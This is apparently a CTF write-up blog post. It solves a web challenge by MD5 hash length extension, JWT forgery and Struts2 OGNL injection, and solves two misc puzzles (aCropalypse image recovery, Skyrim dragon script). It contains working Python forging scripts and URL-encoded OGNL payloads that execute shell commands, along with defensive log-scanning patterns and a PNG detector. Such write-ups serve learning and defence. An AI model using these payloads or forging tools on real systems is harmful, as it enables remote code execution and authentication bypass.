Z1d10tのBlog

A note for myself, have fun!

1. WEB
    1.1. jwt2struts
2. Misc
    2.1. snippingTools
    2.2. old language

As a web player there wasn't much for me to take part in.

WEB

There was only one web challenge.

jwt2struts

Key points:

Hash length extension attack, JWT forgery, Struts2 S2-016

The source reveals JWT_key.php

Source obtained:

```php
<?php
highlight_file(__FILE__);
include "./secret_key.php";
include "./salt.php";
//$salt = XXXXXXXXXXXXXX // the salt include 14 characters
//md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df
// $_POST is already URL-decoded once by PHP, so this is a second decode
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["digest"])) {
    // exactly "root" is rejected (loose comparison), "root" plus extra bytes is not
    if ($username === "admin" && $password != "root") {
        // secret-prefix MAC md5($salt . data) with a known salt length: length-extendable
        if ($_COOKIE["digest"] === md5($salt.$username.$password)) {
            die ("The secret_key is ". $secret_key);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("no no no");
    }
}
```

Skimming it: we would need either the salt or the password root, but a password of exactly root is not allowed.

Either way the condition $_COOKIE["digest"] === md5($salt.$username.$password) has to hold. Since the salt length (14 bytes) and md5($salt."adminroot") are both given, this is a textbook hash length extension: append MD5's padding plus a few extra bytes to root, and compute the new digest without ever knowing the salt.

Just use hashpump directly; reference: https://blog.csdn.net/jblock/article/details/78448143?ops_request_misc=&request_id=&biz_id=102&utm_term=hashpump&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-78448143.nonecase&spm=1018.2226.3001.4187


Once you have the forged digest and the padded password, send them in.

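For anyone who wants to see what hashpump is actually doing rather than just run it, here is the length-extension attack written out in Python. This is an added example, not code from the write-up: it reloads the four MD5 state words from the published digest, appends the glue padding MD5 would have used for the 23-byte message (14-byte salt + "adminroot"), and simply keeps compressing. The salt inside self_check() is made up so the code can verify itself offline against hashlib; against the challenge only the salt length and the published digest are used.

```python
import hashlib
import math
import struct
from urllib.parse import quote, unquote_to_bytes

# MD5 per-round rotation amounts and sine-derived constants.
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xFFFFFFFF for i in range(64)]
_MASK = 0xFFFFFFFF


def _rotl(x, c):
    return ((x << c) | (x >> (32 - c))) & _MASK


def _md5_compress(state, block):
    """One MD5 compression of a 64-byte block onto the 4-word state."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & _MASK
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & _MASK
    return [(x + y) & _MASK for x, y in zip(state, (a, b, c, d))]


def md5_padding(msg_len):
    """The padding MD5 appends to a msg_len-byte message (0x80, zeros, 64-bit LE bit length)."""
    pad = b"\x80" + b"\x00" * ((55 - msg_len) % 64)
    return pad + struct.pack("<Q", (msg_len * 8) & 0xFFFFFFFFFFFFFFFF)


def md5_length_extend(known_digest_hex, known_len, append):
    """Given md5(secret || msg) and len(secret || msg), return
    (md5(secret || msg || glue || append), glue || append) without the secret.
    The digest *is* the internal state after the last block, so we resume from it."""
    state = list(struct.unpack("<4I", bytes.fromhex(known_digest_hex)))
    glue = md5_padding(known_len)                       # pads secret||msg to a block boundary
    total_len = known_len + len(glue) + len(append)     # length the victim will actually hash
    tail = append + md5_padding(total_len)              # always a whole number of blocks
    for off in range(0, len(tail), 64):
        state = _md5_compress(state, tail[off:off + 64])
    return struct.pack("<4I", *state).hex(), glue + append


# Challenge parameters from the PHP source: 14-byte salt, md5(salt . "admin" . "root") given.
SALT_LEN = 14
KNOWN_DIGEST = "e6ccbf12de9d33ec27a5bcfb6a3293df"
KNOWN_TAIL = b"adminroot"


def forge_login(append=b"x", known_digest=KNOWN_DIGEST):
    """POST fields plus cookie that satisfy digest === md5($salt.$username.$password)
    with username 'admin' and a password that is no longer exactly 'root'."""
    digest, suffix = md5_length_extend(known_digest, SALT_LEN + len(KNOWN_TAIL), append)
    password = b"root" + suffix
    # The PHP runs urldecode() on the already-decoded $_POST value, so we percent-encode
    # the padding bytes here and let the HTTP client form-encode the '%' once more;
    # after both decodes the server sees the raw bytes.
    return {"username": "admin", "password": quote(password, safe=""), "digest": digest}


def self_check(salt=b"S3cr3tS4ltXYZ1", append=b"x"):
    """Offline sanity check with a constructed 14-byte salt (the real one is unknown)."""
    assert len(salt) == SALT_LEN
    known = hashlib.md5(salt + KNOWN_TAIL).hexdigest()
    fields = forge_login(append, known)
    password = unquote_to_bytes(fields["password"])
    expected = hashlib.md5(salt + b"admin" + password).hexdigest()
    return fields["digest"] == expected and password != b"root"
```

The extension works because MD5 (like SHA-1 and SHA-256) is Merkle-Damgard with no finalisation step: the output is the raw chaining state, and the only thing the attacker must know besides it is the total length, which the source gives away. An HMAC, or even md5($data.$salt) with the secret at the end, would not be extendable this way.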

That yields the JWT key sk-he00lctf3r, which lets us forge a login token.
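With the HMAC secret in hand, forging the token is just signing our own claims. Added example, not the author's code: the claim set {"username": "admin"} is an assumption, since the write-up does not show the token body. The verify side is included to show what a correct check looks like (algorithm pinned to HS256, constant-time MAC comparison), which is exactly the check that no longer helps once the key itself has leaked.

```python
import base64
import hashlib
import hmac
import json

# Key recovered through the length-extension step in the write-up.
RECOVERED_KEY = b"sk-he00lctf3r"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_jwt(key: bytes, claims: dict) -> str:
    """Mint an HS256 token for arbitrary claims once the HMAC key is known."""
    header = {"alg": "HS256", "typ": "JWT"}
    segments = [_b64url(json.dumps(header, separators=(",", ":")).encode()),
                _b64url(json.dumps(claims, separators=(",", ":")).encode())]
    signing_input = ".".join(segments).encode("ascii")
    sig = hmac.new(key, signing_input, hashlib.sha256).digest()
    return ".".join(segments + [_b64url(sig)])


def verify_jwt(key: bytes, token: str):
    """Server-side check: rejects anything but HS256 (no 'none', no RS/HS confusion)
    and compares the MAC in constant time. Returns the claims dict or None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    head_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(head_b64))
        sig = _b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{head_b64}.{body_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(_b64url_decode(body_b64))


if __name__ == "__main__":
    token = forge_jwt(RECOVERED_KEY, {"username": "admin"})   # assumed claim name
    print(token)
    print(verify_jwt(RECOVERED_KEY, token))
```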

The source also carries a hint: do you know struts2?

When the user submits age as a string rather than an integer, the back end concatenates "'" + value + "'" and evaluates the result as an OGNL expression (this is the Struts2 S2-007 conversion-error pattern). To exploit it you only need a form field with a similar validation rule, make its type conversion fail, and close the single quote the same way you would in SQL injection to inject an arbitrary OGNL expression.

The official write-up injects %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27printenv+FLAG%27%29.getInputStream%28%29%29%29+%2B+%27 into age, but when I reproduced it afterwards it didn't work; there was no output.

My payload, on the other hand, is the one below; it may be an unintended solution. Source: https://xz.aliyun.com/t/4603

```text
/admiiiiiiiiiiin/user.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat /flag%27%29.getInputStream%28%29%29%7D
```

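From the defender's side, both payloads above stand out in an access log as soon as the URL encoding is stripped. Added example, not part of the write-up: a small scanner that percent-decodes the request target until it stops changing (attackers double-encode to slip past single-pass filters) and matches the OGNL fragments the two payloads rely on, plus the redirect:/redirectAction: parameter prefix that S2-016 evaluates. The log lines are constructed in combined-log format from the two payloads on this page, with the space in cat /flag encoded as %20 the way a web server would record it.

```python
import re
from urllib.parse import unquote

# OGNL fragments that have no business in a form field or action name.
OGNL_MARKERS = [
    "#_memberAccess",
    "allowStaticMethodAccess",
    "xwork.MethodAccessor.denyMethodExecution",
    "@java.lang.Runtime@getRuntime",
    "@org.apache.commons.io.IOUtils@toString",
    ".getDeclaredField(",
    "#context[",
]
# S2-016: a parameter named redirect: / redirectAction: is evaluated as OGNL.
S2016_PREFIX = re.compile(r"[?&]redirect(?:Action)?:", re.IGNORECASE)
OGNL_EXPR = re.compile(r"[$%]\{")

# Constructed sample log (Apache combined format) built from the payloads in this write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/May/2023:12:00:01 +0000] "GET /admiiiiiiiiiiin/user.action?name=bob&age=25 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/May/2023:12:00:07 +0000] "POST /admiiiiiiiiiiin/user.action?age=%27+%2B+%28%23_memberAccess'
    '%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context'
    '%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString'
    '%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27printenv+FLAG%27%29.getInputStream%28%29%29%29+%2B+%27 HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/May/2023:12:00:09 +0000] "GET /admiiiiiiiiiiin/user.action?redirect:%24%7B%23context%5B%27xwork.'
    'MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27'
    'allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C@org.apache.'
    'commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/flag%27%29.getInputStream%28%29%29%7D HTTP/1.1" 302 0',
]


def fully_decode(target, rounds=3):
    """Percent-decode until the string stops changing (bounded, so it cannot loop forever)."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def inspect_request(target):
    """Return the list of OGNL indicators found in a request target (path + query)."""
    decoded = fully_decode(target)
    hits = [marker for marker in OGNL_MARKERS if marker in decoded]
    if S2016_PREFIX.search(decoded) and OGNL_EXPR.search(decoded):
        hits.append("redirect-prefix-with-ognl-expression")
    return hits


_LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def scan_log(lines):
    """Yield (client_ip, request_target, hits) for every suspicious access-log entry."""
    for line in lines:
        m = _LINE_RE.match(line)
        if not m:
            continue
        hits = inspect_request(m.group(2))
        if hits:
            yield m.group(1), m.group(2), hits


if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(ip, hits)
```

Matching on decoded substrings is deliberately crude: it is cheap, it catches both the conversion-error style and the redirect: prefix style, and the fragments it keys on (#_memberAccess, the static-method toggles, Runtime.getRuntime) appear in practically every public Struts2 OGNL payload. A WAF bypass would have to avoid all of them, which is much harder than just double-encoding.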

Misc

snippingTools

CVE-2023-28303 (aCropalypse in Windows Snipping Tool: saving a cropped screenshot over the original file does not truncate it, so the tail of the original PNG is left behind after IEND and much of the uncropped image can be recovered)

I found the tool during the competition but never tried it. Damn...

https://github.com/frankthetank-music/Acropalypse-Multi-Tool : just run the tool on the file and recover the image.

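The tool does the recovery; the tell-tale that a PNG is affected at all is much simpler and worth knowing on its own. Added example, not from the write-up or from the tool: walk the chunk list and count the bytes left after IEND. A correctly written PNG has none, while a Snipping Tool crop hit by CVE-2023-28303 carries the tail of the original file there. The sample images and the simulate_acropalypse_crop() helper are constructed to model the bug (the cropped file written over the original without truncation); they are not real Snipping Tool output, and the function only detects, it does not reconstruct the image.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialize one PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def trailing_bytes_after_iend(png: bytes) -> int:
    """Return how many bytes follow the IEND chunk. 0 for a clean PNG; for an
    aCropalypse-affected crop this is the leftover tail of the original image."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(png):                      # 12 = length + type + CRC
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        end = pos + 12 + length
        if end > len(png):
            raise ValueError("truncated %r chunk" % ctype)
        data = png[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", png[pos + 8 + length:end])[0]
        if crc != zlib.crc32(ctype + data) & 0xFFFFFFFF:
            raise ValueError("bad CRC in %r chunk" % ctype)
        pos = end
        if ctype == b"IEND":
            return len(png) - pos
    raise ValueError("no IEND chunk")


def make_sample_png(width=1, height=1) -> bytes:
    """Constructed minimal 8-bit grayscale PNG used as offline sample input."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x80" * width for _ in range(height))  # filter byte + pixels
    return (PNG_SIGNATURE + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(raw)) + png_chunk(b"IEND", b""))


def simulate_acropalypse_crop(original: bytes, cropped: bytes) -> bytes:
    """Model of the buggy save: the cropped PNG is written over the start of the
    original file without truncating it, so the original's tail survives."""
    if len(cropped) >= len(original):
        return cropped
    return cropped + original[len(cropped):]


if __name__ == "__main__":
    original = make_sample_png(64, 64)
    leaky = simulate_acropalypse_crop(original, make_sample_png(1, 1))
    print("clean:", trailing_bytes_after_iend(original), "bytes after IEND")
    print("cropped over original:", trailing_bytes_after_iend(leaky), "bytes after IEND")
```

Any trailing data after IEND is suspicious in a PNG, but the aCropalypse case is recognisable because what follows is the middle of a zlib stream from the original IDAT chunks; that is what the recovery tools then re-synchronise on.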

old language


This one is absurd.

Dragon language, the language that appears in the game The Elder Scrolls V: Skyrim.


*ctf{GIKRVZY}
